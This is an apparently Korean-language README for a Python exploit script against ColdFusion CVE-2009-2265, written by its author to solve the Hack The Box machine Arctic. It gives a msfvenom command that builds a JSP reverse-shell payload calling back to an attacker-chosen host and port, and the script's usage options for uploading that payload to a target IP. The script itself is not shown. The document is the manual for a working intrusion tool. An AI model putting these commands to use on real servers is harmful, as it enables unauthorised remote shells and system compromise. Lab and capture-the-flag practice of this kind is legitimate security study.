
https://cvedetails.com/cve/CVE-2009-2265/ 기반 ColdFusion 익스플로잇
https://cvedetails.com/cve/CVE-2009-2265/ 기반의 콜드퓨전 익스플로잇
이 특정 CVE에 대해 파이썬 스크립트를 만든 주된 이유는 HTB 머신 Arctic을 해결하려고 할 때 동일한 취약점에 대한 metasploit 버전이 작동하지 않았기 때문입니다. 또한 약간의 파이썬 연습을 할 수 있어 좋았습니다. 하지만 Alexander Reid가 원래 만든 동일한 익스플로잇의 다른 파이썬 버전도 있으니, 그의 버전을 사용하고 싶다면 그렇게 해도 됩니다.
사용법은 매우 간단합니다:
페이로드 파일이 생성되어 있는지 확인하십시오
예: msfvenom 사용:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
사용법: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
선택적 인수:
-h, --help show this help message and exit
-t TARGET target ip
-p PORT target port
-f FILEPATH path of file with shellcode to upload
-b BASEPATH coldfusion basepath